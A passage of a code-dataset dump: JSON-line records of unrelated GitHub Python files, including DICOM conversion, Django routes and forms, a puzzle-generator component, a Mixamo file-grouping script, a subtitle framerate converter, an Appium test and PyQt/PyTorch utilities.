The default is {}.\n\n Returns\n -------\n None.\n\n \"\"\"\n #Define CT variables\n outputDirCT = Path(self.OutputDir + '/ct') \n outputDirCT.mkdir(exist_ok=True, parents=True)\n \n input_dcm_dir = str(self.nifti_directory) + '/dicom'\n \n #write deformed ct to dcm\n convert_nifti_to_dicom_series(\n image=image_ct_deformed,\n reference_dcm=input_dcm_dir + '/ct',\n output_directory=str(outputDirCT)\n ) \n \n if structShiftFlag:\n #Create a temporary directory to write the structures to\n TempDirStruct = Path(self.OutputDir + '/OutputStructures')\n TempDirStruct.mkdir(exist_ok=True, parents=True)\n \n #write structure to nifti format \n for struct in deformed_structures:\n sitk.WriteImage(deformed_structures[struct],str(TempDirStruct / str(struct + \".nii.gz\")))\n \n # rtstruct output dir \n output_dir_dcm_STRUCT = Path(self.OutputDir + '/rtstruct') \n output_dir_dcm_STRUCT.mkdir(exist_ok=True, parents=True)\n \n # dictionary containing path of nifti files\n masks = {}\n for m in os.listdir(TempDirStruct):\n name = m.split('.')[0]\n mask_path = str(TempDirStruct / m)\n masks[name] = mask_path \n \n #convert nifti files to struct file\n convert_nifti(\n dcm_path = str(outputDirCT / \"0.dcm\"),\n mask_input = masks, \n output_file = str(output_dir_dcm_STRUCT / \"struct.dcm\")\n ) \n","repo_name":"ACRF-Image-X-Institute/CTHeadDeformation","sub_path":"DeformHeadCT/VolumeInfo.py","file_name":"VolumeInfo.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14326967340","text":"from django.urls import path\nfrom rest_framework.routers import DefaultRouter\n\nfrom . 
import views\n\napp_name = 'microservice_requests'\n\nrouter = DefaultRouter()\n\nurlpatterns = [\n path('register-user/blog', views.ChatRegisterView.as_view(), name=\"blog\"),\n path('categories/blog/', views.CategoriesListView.as_view(), name=\"categories\"),\n path('categories/blog//', views.CategoryChangeView.as_view(), name=\"categories-slug\"),\n]\n\nurlpatterns += router.urls\n","repo_name":"Mikhail-Gorelov/chat_microservice","sub_path":"web/microservice_requests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17134396434","text":"from __future__ import annotations\nimport copy\nfrom dataclasses import dataclass, field\nfrom typing import List, Union, Dict, Set\nfrom enum import Enum, auto\n\nimport numpy as np\nfrom scipy.special import comb\n\nfrom .attribute import (AttributeType, Uniformity, Configuration, PositionType,\n AngularPosition, PlanarPosition)\nfrom .entity import Entity\n\n\nclass ComponentType(Enum):\n NONE = auto()\n LEFT = auto()\n RIGHT = auto()\n UP = auto()\n DOWN = auto()\n OUT = auto()\n IN = auto()\n\n\nclass LayoutType(Enum):\n CENTER = auto()\n GRID_FOUR = auto()\n GRID_FIVE = auto()\n GRID_NINE = auto()\n\n\n@dataclass\nclass PositionHistory:\n available: int\n sampled: List[Set[int]]\n\n\n@dataclass(init=False)\nclass AttributeHistory:\n number: List[int]\n position: Dict[int, PositionHistory]\n shape: List[int]\n size: List[int]\n color: List[int]\n angle: List[int]\n\n def __init__(self, constraints):\n self.number = []\n self.position = {}\n self.shape = []\n self.size = []\n self.color = []\n self.angle = []\n for i in range(constraints.number.min + 1, constraints.number.max + 2):\n self.position[i] = PositionHistory(available=comb(\n constraints.positions.shape[0], i),\n sampled=[])\n\n\n@dataclass\nclass Bounds:\n min: int\n max: int\n\n\n@dataclass\nclass Constraints:\n number: Bounds\n 
shape: Bounds\n size: Bounds\n color: Bounds\n angle: Bounds\n uniformity: Bounds\n position_type: PositionType\n positions: Union[List[AngularPosition], List[PlanarPosition]]\n\n def __post_init__(self):\n self.positions = np.array(self.positions)\n\n\n@dataclass\nclass Component:\n component_type: ComponentType\n layout_type: LayoutType\n constraints: Constraints\n config: Configuration = field(init=False)\n uniformity: Uniformity = field(init=False)\n history: AttributeHistory = field(init=False)\n entities: List[Entity] = field(init=False)\n initial_constraints: Constraints = field(init=False)\n\n def __post_init__(self):\n self.config = Configuration(self.constraints)\n self.uniformity = Uniformity(self.constraints)\n self.history = AttributeHistory(self.constraints)\n self.entities = []\n self.initial_constraints = copy.deepcopy(self.constraints)\n\n def setting_of(self, attr):\n return self.attr(attr).setting\n\n def attr(self, attr):\n return getattr(self.entity, attr.name.lower())\n\n @property\n def entity(self):\n return self.entities[0]\n\n def make_uniform(self, attr):\n setting = self.setting_of(attr)\n for entity in self.entities[1:]:\n entity_attr = getattr(entity, attr.name.lower())\n entity_attr.setting = setting\n\n def set_uniform(self, attr, setting):\n for entity in self.entities:\n entity_attr = getattr(entity, attr.name.lower())\n entity_attr.setting = setting\n\n def set_position(self):\n for entity, bbox in zip(self.entities, self.config.position.value):\n entity.bbox = bbox\n\n def sample(self,\n sample_position=False,\n sample_number=False,\n carryover=True,\n uniform=None):\n if sample_position or sample_number:\n if sample_number:\n self.config.number.sample(self.constraints)\n self.config.position.sample(self.config.number.value)\n if uniform is None:\n uniform = self.uniformity.value\n if uniform:\n if len(self.entities) > 0 and carryover:\n self.entities = [self.entities[0]]\n else:\n self.entities = [\n Entity(name=str(0),\n 
bbox=self.config.position.value[0],\n constraints=self.constraints)\n ]\n for i, bbox in enumerate(self.config.position.value[1:]):\n entity = copy.deepcopy(self.entities[0])\n entity.name = str(i)\n entity.bbox = bbox\n self.entities.append(entity)\n else:\n self.entities = [\n Entity(name=str(i), bbox=bbox, constraints=self.constraints)\n for i, bbox in enumerate(self.config.position.value)\n ]\n\n def sample_unique(self, attr, history, initial_constraints):\n if attr is AttributeType.NUMBER:\n self.config.sample_unique(initial_constraints,\n history,\n inplace=True)\n self.sample(carryover=False)\n elif attr is AttributeType.POSITION:\n self.config.position.sample_unique(self.config.number.value,\n history,\n inplace=True)\n self.set_position()\n elif attr is AttributeType.ANGLE or \\\n attr is AttributeType.UNIFORMITY:\n raise ValueError(f\"unsupported operation attribute: {attr!s}\")\n elif attr in AttributeType:\n if self.uniformity.value:\n self.attr(attr).sample_unique(initial_constraints,\n history,\n inplace=True)\n self.make_uniform(attr)\n else:\n for entity in self.entities:\n entity_attr = getattr(entity, attr.name.lower())\n entity_attr.sample_unique(initial_constraints,\n history,\n inplace=True)\n else:\n raise ValueError(\"unsupported operation\")\n\n\ndef make_component(component_type, layout_type, position_type, positions, *,\n number_min, number_max, shape_min, shape_max, size_min,\n size_max, color_min, color_max, angle_min, angle_max,\n uniformity_min, uniformity_max):\n return Component(component_type=component_type,\n layout_type=layout_type,\n constraints=Constraints(number=Bounds(min=number_min,\n max=number_max),\n shape=Bounds(min=shape_min,\n max=shape_max),\n size=Bounds(min=size_min,\n max=size_max),\n color=Bounds(min=color_min,\n max=color_max),\n angle=Bounds(min=angle_min,\n max=angle_max),\n uniformity=Bounds(\n min=uniformity_min,\n max=uniformity_max),\n position_type=position_type,\n 
positions=positions))\n","repo_name":"shlomenu/raven-gen","sub_path":"src/raven_gen/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"150182975","text":"import os\nimport argparse\nimport pdb\n\n\ndef makedir(folder):\n if not os.path.isdir(folder):\n os.makedirs(folder)\n\naction_class = {'air squat bent arms': 'squat',\n 'air squat': 'squat',\n 'baseball hit': 'hit',\n 'baseball strike': 'hit',\n 'baseball pitching (1)': 'pitch',\n 'baseball pitching': 'pitch',\n 'cheering while sitting (1)': 'cheer',\n 'cheering while sitting': 'cheer',\n 'clapping (1)': 'clap',\n 'clapping': 'clap',\n 'climbing (1)': 'climb',\n 'climbing': 'climb',\n 'crouch walk left': 'crossstep',\n 'standing walk left': 'crossstep',\n 'hook': 'hook',\n 'hook punch': 'hook',\n 'jumping': 'jump',\n 'standing jump': 'jump',\n 'kicking': 'kick',\n 'roundhouse kick': 'kick',\n 'kneeing soccerball (1)': 'knee',\n 'kneeing soccerball': 'knee',\n 'pick fruit (1)': 'pick',\n 'pick fruit': 'pick',\n 'prone roll': 'roll',\n 'roll left': 'roll',\n 'running': 'run',\n 'treadmill running': 'run',\n 'stall soccerball': 'stall',\n 'stall soccerball (1)': 'stall',\n 'start walking (1)': 'walk',\n 'start walking': 'walk',\n 'waving (1)': 'wave',\n 'waving': 'wave',\n 'zombie stand up (1)': 'standup',\n 'zombie stand up': 'standup',\n 'quick formal bow': 'bow',\n 'quick informal bow': 'bow',\n 'push start': 'push',\n 'push stop': 'push',\n }\n\nappearance = {}\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_path', type=str, help='the path of downloaded models')\n parser.add_argument('--output_path', type=str, help='the path of grouped models, one level above the actor name')\n args = parser.parse_args()\n\n for file in os.listdir(args.input_path):\n if file.endswith('.fbx'):\n # separate the actor and action name, e.g. 
swat@Air Squat Bent Arms.fbx\n tokens = file.split('.')[0].split('@')\n # get the actor name\n actor = tokens[0].lower()\n # get the action name\n action = tokens[1].lower()\n action_clss = action_class.get(action, None)\n file = file.replace(' ', '\\ ').replace('(', '\\(').replace(')', '\\)')\n file_path = os.path.join(args.input_path, file)\n if action_clss is None:\n\n os.system('rm %s' % file_path)\n else:\n actor_appearance = appearance.get(actor, {})\n actor_appearance[action] = actor_appearance.get(action, 0) + 1\n appearance[actor] = actor_appearance\n output_dir = os.path.join(args.output_path, actor, action_clss)\n makedir(output_dir)\n os.system('cp %s %s' % (file_path, output_dir))\n\n for actor in appearance.keys():\n for action in action_class.keys():\n if action not in appearance[actor].keys():\n print('For actor \\'%s\\', actor \\' %s \\' is missing' % (actor, action))\n\n\nif __name__ == '__main__':\n main()","repo_name":"sunxm2357/TwoStreamVAN","sub_path":"preprocess/Mixamo/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"26420803748","text":"import streamlit as st\nfrom pandera.typing import DataFrame\n\nfrom encord_active.app.common.components.prediction_grid import prediction_grid\nfrom encord_active.app.common.state import get_state\nfrom encord_active.lib.charts.histogram import get_histogram\nfrom encord_active.lib.common.colors import Color\nfrom encord_active.lib.model_predictions.map_mar import (\n PerformanceMetricSchema,\n PrecisionRecallSchema,\n)\nfrom encord_active.lib.model_predictions.reader import (\n LabelMatchSchema,\n PredictionMatchSchema,\n)\n\nfrom . 
import ModelQualityPage\n\n\nclass FalsePositivesPage(ModelQualityPage):\n title = \"🌡 False Positives\"\n\n def sidebar_options(self):\n self.prediction_metric_in_sidebar()\n self.row_col_settings_in_sidebar()\n\n def build(\n self,\n model_predictions: DataFrame[PredictionMatchSchema],\n labels: DataFrame[LabelMatchSchema],\n metrics: DataFrame[PerformanceMetricSchema],\n precisions: DataFrame[PrecisionRecallSchema],\n ):\n metric_name = get_state().predictions.metric_datas.selected_predicion\n if not metric_name:\n st.error(\"No prediction metric selected\")\n return\n\n st.markdown(f\"# {self.title}\")\n color = Color.RED\n with st.expander(\"Details\"):\n st.markdown(\n f\"\"\"### The view\nThese are the predictions for which either of the following is true\n1. The IOU between the prediction and the best matching label was too low\n2. There was another prediction with higher model confidence which matched the label already\n3. The predicted class didn't match\n\n---\n\n**Color**:\nThe {color.name.lower()} boxes marks the false positive predictions.\nThe remaining colors correspond to the dataset labels with the colors you are used to from the label editor.\n\"\"\",\n unsafe_allow_html=True,\n )\n self.metric_details_description()\n\n fp_df = model_predictions[model_predictions[PredictionMatchSchema.is_true_positive] == 0.0].dropna(\n subset=[metric_name]\n )\n if fp_df.shape[0] == 0:\n st.write(\"No false positives\")\n else:\n histogram = get_histogram(fp_df, metric_name)\n st.altair_chart(histogram, use_container_width=True)\n prediction_grid(get_state().project_paths.data, model_predictions=fp_df, box_color=color)\n","repo_name":"feemthan/encord-active","sub_path":"src/encord_active/app/model_quality/sub_pages/false_positives.py","file_name":"false_positives.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"5121765822","text":"if __name__ == \"__main__\":\n 
kebabs = ['meat', 'vegetable', 'falafel']\n\n for kebab in kebabs:\n if kebab == 'falafel':\n print(kebab.upper())\n else:\n print(kebab.title())\n\n liked_food = 'chicken tikka masala'\n\n if liked_food == 'Pasta':\n print(\"Ew, that's disgusting\")\n else:\n print(\"sheesh\")\n\n\n age = 70\n if age >= 50:\n print(\"\\nYou are old, you sad sad soul.\")\n else:\n print(\"\\nYou are one young bean!\")\n\n\n nut_mix = ['almonds', 'walnuts', 'peanuts']\n\n for nut in nut_mix:\n print(f\"\\nAdding {nut}.\")\n print(\"\\nFinished making your nut bowl. Come again to Nut and Co!\")\n\n\n nutz_mix = ['walnuts', 'peanuts']\n\n wanted_nuts = ['kebab nut']\n\n for wanted_nut in wanted_nuts:\n if wanted_nut in nutz_mix:\n print(f\"\\nAdding {wanted_nut}.\")\n else:\n print(f\"\\n\\nSorry, but we don't have your wanted {wanted_nut}.\")\n\n print(\"\\nWe finished making your nut mix. Come again soon.\")\n\n\n def measure_age(age):\n if age > 70:\n print(\"\\nOLD\")\n elif age < 30:\n print(\"\\nYOUNG\")\n else:\n print(\"\\nmeduim\")\n\n measure_age(35)\n measure_age(45)\n measure_age(75)\n measure_age(25)","repo_name":"IllusoryPig/VariablesAndDataTypes","sub_path":"ChapterFive.py","file_name":"ChapterFive.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26189122045","text":"'''\n\nGiven an array of integers A, of size N.\n\nReturn the maximum size subarray of A having only non-negative elements. 
\nIf there are more than one such subarray, return the one having the smallest starting index in A.\n\n'''\ndef solve(A):\n count = 0\n for i in range(len(A)):\n if A[i] == 1:\n count += 1\n if count == len(A):\n return A\n \n max_len = 0\n min_index = 0\n for i in range(len(A)):\n # print(\"A[i] \",A[i],i)\n if A[i] > 0:\n length = 0\n for j in range(i,len(A)):\n if A[j] > 0:\n length += 1 \n\n if A[j] < 0:\n length = 0\n\n break\n # print(length)\n if max_len < length:\n max_len = length\n min_index = i\n # print(\"max len min_index\",max_len,min_index)\n \n return A[min_index:max_len+i]\n\n# A = [5, 6, -1, 7, 8,9]\n# print(solve(A))\n\n","repo_name":"chinuteja/SCALER","sub_path":"MODULE-2/Arrays/Maximum positivity.py","file_name":"Maximum positivity.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27955583174","text":"from django.core.management.base import BaseCommand, CommandError\nfrom cardhandler.models import Card\nimport json\n\n\n# card_data = dict()\n# with open(\"oracle-cards-20211007090329.json\", \"r+\") as j:\n# card_data = json.load(j)\n# # breakpoint()\n# print(card_data[0])\n\n\nclass Command(BaseCommand):\n help = 'bootstrap to populate dropdown'\n\n def handle(self, *args, **options):\n cards = Card.objects.all()\n cards.delete()\n\n with open(\"oracle-cards-20211007090329.json\", \"r+\") as j:\n card_data = json.load(j)\n\n # breakpoint()\n # print(card_data[0])\n broken_list = []\n for card_dict in card_data:\n if card_dict.get('arena_id') or 'arena' in card_dict['games']:\n images = card_dict.get(\"image_uris\")\n small_url = \"\"\n normal_url = \"\"\n art_crop_url = \"\"\n\n alt_small_url = \"\"\n alt_normal_url = \"\"\n alt_art_crop_url = \"\"\n if images:\n images = dict(images)\n if images:\n small_url = images.get(\"small\")\n normal_url = images.get(\"normal\")\n art_crop_url = images.get(\"art_crop\")\n\n if card_dict.get('layout') 
== \"modal_dfc\":\n card_dict['name'] = card_dict.get('card_faces')[\n 0].get('name')\n images = card_dict.get('card_faces')[0].get(\n 'image_uris')\n if images:\n small_url = images.get(\"small\")\n normal_url = images.get(\"normal\")\n art_crop_url = images.get(\"art_crop\")\n alt_images = card_dict.get('card_faces')[1].get(\n 'image_uris')\n if alt_images:\n alt_small_url = alt_images.get(\"small\")\n alt_normal_url = alt_images.get(\"normal\")\n alt_art_crop_url = alt_images.get(\"art_crop\")\n print(card_dict[\"set\"], card_dict['collector_number'])\n Card.objects.create(\n name=card_dict.get(\"name\"),\n mana_cost=card_dict.get(\"mana_cost\"),\n type_line=card_dict.get(\"type_line\"),\n layout=card_dict.get('layout'),\n set=card_dict.get(\"set\"),\n collector_number=card_dict.get('collector_number'),\n set_name=card_dict.get(\"set_name\"),\n oracle_id=card_dict.get(\"oracle_id\"),\n arena_id=card_dict.get(\"arena_id\"),\n oracle_text=card_dict.get(\"oracle_text\"),\n image_url_small=small_url,\n image_url_normal=normal_url,\n image_url_art_crop=art_crop_url,\n alt_image_url_small=alt_small_url,\n alt_image_url_normal=alt_normal_url,\n alt_image_url_art_crop=alt_art_crop_url,\n legalities=card_dict.get('legalities')\n )\n","repo_name":"marcuschiriboga/magicsite","sub_path":"cardhandler/management/commands/bootstrap_data.py","file_name":"bootstrap_data.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40466601016","text":"import time\n\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\n\ndes = {\n 'platformName': 'Android',\n 'platformVersion': '7.0.1', #填写android虚拟机的系统版本\n 'deviceName': 'Samsung Galaxy S9', #填写安卓虚拟机的设备名称\n 'appPackage': 'com.android.calculator2', #填写被测试包名\n 'appActivity': 'com.android.calculator2.Calculator', #填写被测试app入口\n 'udid': '192.168.56.102:5555', # 填写通过命令行 adb devices 查看到的 
uuid(指定已连接在MAC上的虚拟机)\n 'noReset': True,\n 'unicodeKeyboard': True,\n 'resetKeyboard': True,\n}\n\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', des)\n#xpath属性定位\ntime.sleep(3)\ndriver.find_element_by_xpath(\"//android.widget.Button[@resource-id='com.android.calculator2:id/digit_8']\").click()\ntime.sleep(2)\ndriver.find_element_by_xpath(\"//android.widget.Button[@text='x']\").click()\ntime.sleep(2)\ndriver.find_element_by_xpath(\"//android.widget.Button[@text='2']\").click()\ntime.sleep(3)\ndriver.find_element_by_xpath(\"//android.widget.Button[@content-desc='delete' and @resource-id='com.android.calculator2:id/del']\").click()\n","repo_name":"sunny-lhy-zqw/niucoo","sub_path":"xpath_test.py","file_name":"xpath_test.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23655381451","text":"def count(str):\n## lady = [] # stores the different color variables\n## counter = [] # stores the occurances of each color variable in the order of the lady bucket\n d = {}\n for i in str: # runs through each item in the parameter string\n if i != \"_\": # as long as i is not underscore\n if i not in d: # if the i is not in the lady bucket\n## lady.append(i) # add i to the lady bucket\n## counter.append(1) # add 1 t the counter bucket to begin the count and create the range\n d[i] = 1\n else: #otherwise\n d[i] += 1 #adds 1 to each occurance of i at the index of i\n return d\n\ndef happy(n,str):\n if n < 3: #if the length is less than 3 (if length is 2,1,0)\n if n == 0: #the string can't have nothing in it\n return False\n elif n == 1 and str[0] == \"_\": #if only an empty cell\n return True\n elif n ==2 and str[0] == str[1]: #if the first is the same as the second\n return True\n else:\n return False\n else: # if length is greater than 3 and \"_\" in b\n first = str[0]\n d = dict(count(str)).values()\n counter = 0\n if min(d) >= 2 and \"_\" not in str:\n for i in 
range(1,n):\n if first==str[i]:\n continue\n else:\n first = str[i]\n counter = counter + 1\n if counter >= len(d):\n return False\n else:\n return True\n if min(d) < 2:\n return False\n return True\n\ndef happyLadybug(n,b):\n if happy(n,b) == True: #if happy/True\n return \"YES\"\n else:\n return \"NO\"\n \ndef test(n,b):\n return happyLadybug(n,b)\n\nprint(\"-----------YES-----------\")\nprint(1, test(7,\"RBY_YBR\"), \"YES\")\nprint(2, test(6,\"B_RRBR\"), \"YES\")\nprint(3, test(7,\"AABBC_C\"), \"YES\")\nprint(4, test(4,\"AABB_\"), \"YES\")\nprint(5, test(1,\"_\"), \"YES\")\nprint(6, test(2,\"__\"), \"YES\")\nprint(7, test(10,\"DD__FQ_QQF\"), \"YES\")\nprint(8, test(3,\"DD_\"), \"YES\")\nprint(9, test(2,\"DD\"), \"YES\")\nprint(10, test(9,\"QQAABBCCC\"), \"YES\")\nprint(11, test(9,\"QAQABB_CC\"), \"YES\")\nprint(\"-----------NO------------\")\nprint(1, test(6,\"X_Y__X\"), \"NO\")\nprint(2, test(5,\"AABBC\"), \"NO\")\nprint(3, test(2,\"RX\"), \"NO\")\nprint(4, test(0,\"\"), \"NO\")\nprint(5, test(4,\"QAQA\"), \"NO\")\nprint(6, test(4,\"BAAB\"), \"NO\")\nprint(6, test(5,\"AABAA\"), \"NO\")\n","repo_name":"ef1301/csci127-assignments","sub_path":"lab_04/lady.py","file_name":"lady.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15528216432","text":"from django import forms\n\nfrom .models import Region, Subregion\n\nPAYMENT_OPTIONS = (\n (\"C\", \"Cash\"),\n (\"P\", \"PayPal\"),\n)\n\n\nclass CheckoutForm(forms.Form):\n address = forms.CharField(\n max_length=200,\n required=True,\n label=\"Address\",\n widget=forms.TextInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"123, Quang Trung St, Ward 10\",\n }\n ),\n )\n address2 = forms.CharField(\n max_length=200,\n required=False,\n label=\"Address 2 (Optional)\",\n widget=forms.TextInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"Apartment, block, suite, etc.\",\n }\n ),\n 
)\n region = forms.ModelChoiceField(\n queryset=Region.objects.all(),\n label=\"Province/City\",\n empty_label=\"Select\",\n widget=forms.Select({\"class\": \"form-control\"}),\n )\n subregion = forms.ModelChoiceField(\n queryset=Subregion.objects.none(),\n label=\"District/City\",\n empty_label=\"Select\",\n widget=forms.Select({\"class\": \"form-control\"}),\n )\n # same_shipping_address = forms.BooleanField(required=False)\n # save_info = forms.BooleanField(required=False)\n # payment_option = forms.ChoiceField(choices=PAYMENT_OPTIONS)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if \"region\" in self.data: # Check if region data is submitted\n try:\n region_id = int(self.data.get(\"region\"))\n self.fields[\"subregion\"].queryset = Subregion.objects.filter(\n region_id=region_id\n )\n except (ValueError, TypeError):\n pass\n","repo_name":"D2VD/testweb2","sub_path":"market/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15943581924","text":"\"\"\"\nReverse a String – Enter a string and the program will reverse it and\nprint it out.\n \"\"\"\nimport sys\n\ndef reverse_string (text):\n chars = list(text)\n chars.reverse()\n return ''.join(chars)\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n text = reverse_string(sys.argv[1])\n else:\n text = 'Error: No string!'\n print(text)\n","repo_name":"Mirsait/mega_projects","sub_path":"Text/reverse_a_string/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40588283164","text":"#!/usr/bin/env python3\n\n\nimport argparse\n\nclass Formatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter):\n pass\n\nparser = argparse.ArgumentParser(\n description='''Convert 24fps SRT files to 23.976 
fps.\nDavinci Resolve project exports in 24fps even when the project is in 23.976, so this conversion is needed to prevent the SRT files from drifting.\n\nAuthor: Kiyoon Kim (yoonkr33@gmail.com)''',\n formatter_class=Formatter)\nparser.add_argument('input_files', type=str, nargs='+',\n help='files you want to change names into dates')\n\nargs = parser.parse_args()\n\nimport coloredlogs, logging, verboselogs\n\nimport os, sys\nimport glob\nimport srt\nimport datetime\n\nimport srt_utils\n\n\nif __name__ == \"__main__\":\n logger = verboselogs.VerboseLogger(__name__)\n coloredlogs.install(fmt='%(asctime)s - %(levelname)s - %(message)s', level='INFO', logger=logger)\n\n nb_error = 0\n nb_warning = 0\n\n num_input_files = 0\n for origpath in args.input_files:\n for path in glob.glob(origpath): # glob: Windows wildcard support\n num_input_files += 1\n\n logger.info(\"%d files to convert\", num_input_files)\n\n for origpath in args.input_files:\n for source_file in glob.glob(origpath): # glob: Windows wildcard support\n root, fname_ext = os.path.split(source_file)\n fname, fext = os.path.splitext(fname_ext)\n\n dest_file = source_file\n\n logger.info(\"Converting SRT to %s\", dest_file)\n\n with open(source_file, 'r', encoding=\"utf8\") as f:\n srt_lines = list(srt.parse(f))\n\n srt_utils.srt_drift_fix_NTSC(srt_lines)\n\n with open(dest_file, 'w', encoding=\"utf8\") as f:\n f.write(srt.compose(srt_lines))\n\n if nb_warning > 0:\n logger.warning(\"%d warning(s) found.\", nb_warning)\n\n if nb_error > 0:\n logger.error(\"%d error(s) found.\", nb_error)\n else:\n logger.success(\"Conversion successful!\")\n","repo_name":"kiyoon/camera-tools","sub_path":"srt_framerate_convert.py","file_name":"srt_framerate_convert.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18233175519","text":"import csv\nimport os\nimport shutil\nimport sys\nimport numpy as np\nfrom PyQt5 import 
QtWidgets, QtCore, QtGui, sip\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom xlsxwriter.workbook import Workbook\nimport SimpleITK as sitk \nfrom time import sleep\nimport qtawesome\nimport cv2\nimport shutil\nfrom copy import deepcopy\nimport subprocess\nimport xlwt\nimport logging\nfrom PIL import Image, ImageQt\nimport torch \nimport torch.nn as nn\nfrom torchvision.models import resnet18\n\nlabel_to_id = {\n 'BACKGROUND': 0,\n 'MPSI': 1,\n 'MPSO': 2,\n 'MVEN': 3,\n 'SAT': 4,\n 'VAT': 5,\n}\n\ncmap = np.array(\n [\n (0, 0, 0),\n (255, 255, 0),\n (0, 205, 0),\n (72, 118, 255),\n (0, 0, 139),\n (255, 0, 0),\n ],\n dtype=np.uint8,\n)\n\ndef read_dcm(dcm_dir):\n reader = sitk.ImageSeriesReader()\n img_name = reader.GetGDCMSeriesFileNames(dcm_dir)\n reader.SetFileNames(img_name)\n image = reader.Execute()\n return image\n\nclass MyThread(QThread):\n signalForText = pyqtSignal(str)\n\n def __init__(self, data=None, parent=None):\n super(MyThread, self).__init__(parent)\n self.data = data\n\n def write(self, text):\n self.signalForText.emit(str(text)) # 发射信号\n\n def run(self):\n log = os.popen(self.data)\n print(log.read())\n\ndef build_logging(filename):\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename=filename,\n filemode='w')\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n return logging\n\nclass L3LocModel(nn.Module):\n def __init__(self, N_neighbor=2, d_model=512):\n super().__init__()\n \n backbone = resnet18(pretrained=False)\n backbone.conv1 = nn.Conv2d(1, backbone.conv1.out_channels,\n kernel_size=backbone.conv1.kernel_size,\n stride=backbone.conv1.stride,\n bias=backbone.conv1.bias)\n self.pool = None\n self.cnn = 
nn.Sequential(*list(backbone.children())[:-1])\n self.classifier = nn.Sequential(\n nn.Dropout(p=0.0),\n nn.Linear(d_model*(1+2*N_neighbor), d_model),\n nn.Linear(d_model, 1)\n )\n self.N_neighbor = N_neighbor\n\n def forward(self, x, N_lst=None):\n # x: (B, N, 3, 96, 96)\n B, N, C, H, W = x.shape\n x = x.view(B*N, C, H, W)\n cnn_feat = self.cnn(x)\n if self.pool:\n cnn_feat = self.pool(cnn_feat)\n cnn_feat = cnn_feat.view(B, N, 1, -1) # (B, N, 1, 512)\n \n feat = []\n for n in range(-self.N_neighbor, self.N_neighbor+1): # (-2, -1, 0, 1, 2)\n if n <= 0: \n tmp = cnn_feat[:, abs(n):, ...]\n tmp = torch.cat([tmp, torch.zeros(B, abs(n), *cnn_feat.shape[-2:]).float().to(cnn_feat.device)], dim=1)\n else: \n tmp = cnn_feat[:, :-n, ...]\n tmp = torch.cat([torch.zeros(B, n, *cnn_feat.shape[-2:]).float().to(cnn_feat.device), tmp], dim=1)\n feat.append(tmp)\n feat = torch.cat(feat, dim=2) # (B, N, 1+2*N_neighbor, 512)\n feat = feat.view(B, N, -1)\n pred = self.classifier(feat).squeeze(dim=2)\n return pred","repo_name":"czifan/TSPC.PyQt5","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"5239504342","text":"import os\nfrom app import app, models, sr_net\nfrom werkzeug.utils import secure_filename\nfrom flask import Flask, request, redirect, url_for, render_template, send_from_directory\n\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\ndef allowed_file(filename):\n return '.' 
